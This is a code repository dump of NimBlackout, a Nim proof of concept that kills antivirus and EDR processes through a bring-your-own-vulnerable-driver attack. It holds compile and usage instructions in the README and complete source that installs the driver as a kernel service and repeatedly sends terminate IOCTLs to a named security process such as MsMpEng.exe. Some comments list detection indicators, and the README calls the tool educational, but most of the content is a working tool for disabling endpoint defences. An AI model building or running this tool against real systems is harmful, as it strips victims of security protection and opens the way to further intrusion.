Repository: Helixo32/NimBlackout
Branch: main
Commit: 3777723e9b0e
Files: 3
Total size: 5.4 KB
Directory structure:
gitextract_1osb6zj2/
├── README.md
└── src/
├── Blackout.sys
└── NimBlackout.nim
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# NimBlackout
[](https://nim-lang.org/)
> **Note**: This project is for educational purposes only. The use of this code for any malicious activity is strictly prohibited. I am not responsible for any misuse of this software.
NimBlackout is an adaptation of the [@Blackout](https://github.com/ZeroMemoryEx/Blackout) project originally developed in C++ by [@ZeroMemoryEx](https://github.com/ZeroMemoryEx), which consists of removing AV/EDRs using the gmer (BYOVD) driver.
The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.
All credit goes to the original author [@ZeroMemoryEx](https://github.com/ZeroMemoryEx).
# Usage
- Compilation
- Linux
```
nim --os:windows --cpu:amd64 --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc c NimBlackout.nim
```
- Windows
```
nim c NimBlackout.nim
```
- Put the Blackout.sys driver into the current directory
- Launch NimBlackout (with admin privileges)
```
NimBlackout.exe <process name>
```
To prevent the process from restarting (e.g. MsMpEng.exe), keep the program running.
# Demo

================================================
FILE: src/NimBlackout.nim
================================================
import winim
import strformat
import strutils
import os
import parseopt
# IOCTL control codes exchanged with the Blackout driver over the
# \\.\NimBlackout device (see NimBlackout below). Together with the
# service/device name they are the host-observable indicators of this tool.
# Sent once, with the target PID, right after the device handle is opened.
const INITIALIZE_IOCTL_CODE = 0x9876C004
# Sent repeatedly from the kill loop with the current PID of the target.
const TERMINATE_PROCESS_IOCTL_CODE = 0x9876C094
# Overload $ proc to allow string conversion of szExeFile
proc `$`(a: array[MAX_PATH, WCHAR]): string =
  ## Converts a fixed-size wide-char buffer (e.g. PROCESSENTRY32.szExeFile)
  ## to a Nim string by viewing it as a NUL-terminated WideCString that
  ## starts at its first element.
  let wide = cast[WideCString](unsafeAddr a[0])
  result = $wide
proc GetPID(process_name: string): DWORD =
  ## Returns the PID of the first process whose image name (szExeFile)
  ## equals `process_name` exactly (case-sensitive), or 0 when no process
  ## matches. Uses a Toolhelp32 process snapshot that is closed on exit.
  ##
  ## Note: the entry returned by Process32First is only used to prime the
  ## iteration; comparison starts with the first Process32Next entry.
  var entry: PROCESSENTRY32
  entry.dwSize = cast[DWORD](sizeof(PROCESSENTRY32))
  let snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
  defer: CloseHandle(snapshot)
  if Process32First(snapshot, addr entry):
    while Process32Next(snapshot, addr entry):
      if $entry.szExeFile == process_name:
        return entry.th32ProcessID
  return 0
proc LoadDriver(driver_path: cstring): bool=
  ## Registers `driver_path` with the Service Control Manager as a
  ## demand-start kernel-mode driver service named "NimBlackout" and
  ## starts it. Returns true once StartServiceA has been called, false when
  ## the SCM could not be opened or the service could not be created.
  ##
  ## Detection note: this is the host-observable step of the BYOVD load —
  ## a user-mode process creating a new kernel driver service (SCM
  ## "service installed" event, service name "NimBlackout", binary path =
  ## driver_path). A driver blocklist / HVCI policy is the control that
  ## keeps the known-vulnerable driver itself from loading.
  var
    hSCM: SC_HANDLE
    hService: SC_HANDLE
    service_name: string = "NimBlackout"
  # Open a handle to the SCM database
  hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)
  if hSCM == 0:
    # Plain string literal (not fmt""), so the braces are printed verbatim.
    echo "[-] OpenSCManager failed {GetLastError()}"
    return false
  # Access mask covers start, stop and delete; the driver is registered as
  # SERVICE_KERNEL_DRIVER with no dependencies, account or load-order group.
  hService = CreateServiceA(
    hSCM,
    service_name,
    service_name,
    SERVICE_START or DELETE or SERVICE_STOP,
    SERVICE_KERNEL_DRIVER,
    SERVICE_DEMAND_START,
    SERVICE_ERROR_IGNORE,
    &driver_path,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL
  )
  if hService == 0:
    # 1073 is ERROR_SERVICE_EXISTS (the service was registered by an
    # earlier run); that case is treated as success.
    if GetLastError() == 1073:
      StartServiceA(hService, 0, NULL)
      echo "[+] Service started"
      return true
    else:
      echo fmt"[-] CreateService failed: {GetLastError()}"
      return false
  StartServiceA(hService, 0, NULL)
  echo "[+] Service started"
  CloseServiceHandle(hService)
  CloseServiceHandle(hSCM)
  return true
proc NimBlackout(process_name: string, driver_path: cstring): void=
  ## Core routine: loads the driver, opens its device object, sends the
  ## initialize IOCTL with the target PID, then loops forever re-sending
  ## the terminate IOCTL so that a restarted instance of `process_name`
  ## is killed again. Never returns normally once the driver is
  ## initialized; failures after that point call quit(1).
  ##
  ## Host-observable indicators, all visible in this block: the device
  ## object name \\.\NimBlackout, the two IOCTL codes declared above, and
  ## the service name used by LoadDriver. The repeated terminations of a
  ## protected process from a kernel context are the behavioural signal.
  var
    hDevice: HANDLE
    target_pid: DWORD
    bytes_returned: DWORD
    output: DWORD
    outputSize: DWORD = cast[DWORD](sizeof(output))
    # Local flag for DeviceIoControl's return value; the proc returns
    # void, so this does not shadow an implicit `result`.
    result: bool
  if LoadDriver(driver_path):
    echo "[+] Driver loaded successfully !"
  else:
    echo "[-] Failed to load driver, try to run as administrator !"
    return
  # Open the driver's device object; this is the channel for the IOCTLs.
  hDevice = CreateFileA("\\\\.\\NimBlackout", GENERIC_READ or GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0)
  if hDevice == INVALID_HANDLE_VALUE:
    echo fmt"[-] Failed to open handle to driver, error code: {GetLastError()}"
    return
  echo "[+] Handle to driver open !"
  target_pid = GetPID(process_name)
  if target_pid == 0:
    echo fmt"[-] {process_name} not found !"
    quit(1)
  echo fmt"[+] PID of {process_name}: {target_pid}"
  # NOTE(review): the input length is given as 64 here but as
  # sizeof(target_pid) in the loop below — the two calls are inconsistent.
  result = DeviceIoControl(hDevice, cast[DWORD](INITIALIZE_IOCTL_CODE), &target_pid, 64, &output, outputSize, &bytes_returned, NULL)
  if result == false:
    echo "[-] Driver failed to initialize"
    echo "[*] Windows error code: " & $GetLastError()
    quit(1)
  echo "[+] Driver initialized !"
  # Kill loop: re-resolve the PID every iteration (the target may have
  # restarted) and ask the driver to terminate it. There is no sleep, so
  # this spins at full speed while the target is absent or the IOCTL fails.
  while true:
    target_pid = GetPID(process_name)
    if target_pid == 0:
      continue
    result = DeviceIoControl(hDevice, cast[DWORD](TERMINATE_PROCESS_IOCTL_CODE), &target_pid, cast[DWORD](sizeof(target_pid)), &output, outputSize, &bytes_returned, NULL)
    if result == false:
      echo "[-] Process failed to terminate"
      echo "[*] Windows error code: " & $GetLastError()
      continue
    echo "[+] Process has been terminated !\n\\_ [*] Keep running if you want avoid restarting"
when isMainModule:
  # Entry point: `NimBlackout.exe <process name>`.
  var args: seq[string] = commandLineParams()
  # `par` is never read: getopt() below builds its own parser from `args`.
  var par = initOptParser(args)
  var process: seq[string]
  # Collect positional arguments; short and long options are accepted
  # and ignored.
  for kind, key, val in args.getopt():
    case kind
    of cmdLongOption, cmdShortOption:
      discard
    of cmdArgument:
      process.add key
    # getopt stops before yielding cmdEnd, so this branch is unreachable.
    of cmdEnd: assert(false)
  # The driver is looked up in the current working directory (not next to
  # the executable), matching the README's "put Blackout.sys into current
  # directory" step.
  var driver_path = getCurrentDir() & r"\Blackout.sys"
  try:
    # Raises an index error when no positional argument was given.
    var process_target = process[0]
    NimBlackout(process_target, driver_path)
  except:
    # Bare except: the missing-argument index error and anything raised
    # inside NimBlackout both end up printing the usage line.
    echo "\n[*] Usage: NimBlackout.exe <process to kill>\n"